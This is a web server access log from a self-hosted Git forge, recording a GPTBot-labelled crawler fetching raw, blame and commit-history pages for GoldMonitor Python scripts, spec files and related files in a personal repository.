"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libgcc_s_seh-1.dll" -[17/Feb/2026:14:27:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 150852] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libgcc_s_seh-1.dll" -[17/Feb/2026:14:27:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 312479] [Gzip 21.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libgcc_s_seh-1.dll" -[17/Feb/2026:14:27:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:14:27:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 9892] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:14:27:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 9866] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:14:27:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 10414] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:14:27:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 11793] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:14:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 22872] [Gzip 11.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:14:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 12625] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:14:27:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 12397] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:14:27:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 20872] [Gzip 10.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:14:27:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 20839] [Gzip 10.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:14:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 19036] [Gzip 9.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:14:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 179] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:14:27:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:14:27:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 20870] [Gzip 6.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:14:27:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10393] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm" -[17/Feb/2026:14:27:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 22910] [Gzip 11.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:14:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:14:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:14:27:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 11573] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:14:27:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 9894] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:14:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:14:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:14:27:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 19390] [Gzip 6.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:14:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 12358] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:14:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:14:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 22304] [Gzip 11.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:14:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 9577] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:14:27:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 20789] [Gzip 6.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:14:27:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 17968] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" -[17/Feb/2026:14:27:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 12522] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:14:27:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 8547] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:14:27:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:14:27:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 10263] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:14:27:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:14:27:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 9894] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:14:27:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 11489] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:14:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 20471] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:14:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 8126] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:14:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:14:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 9867] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:14:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 11750] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:14:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:14:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 22184] [Gzip 11.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:14:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:14:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 18377] [Gzip 9.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:14:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 6379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:14:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 9500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:14:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 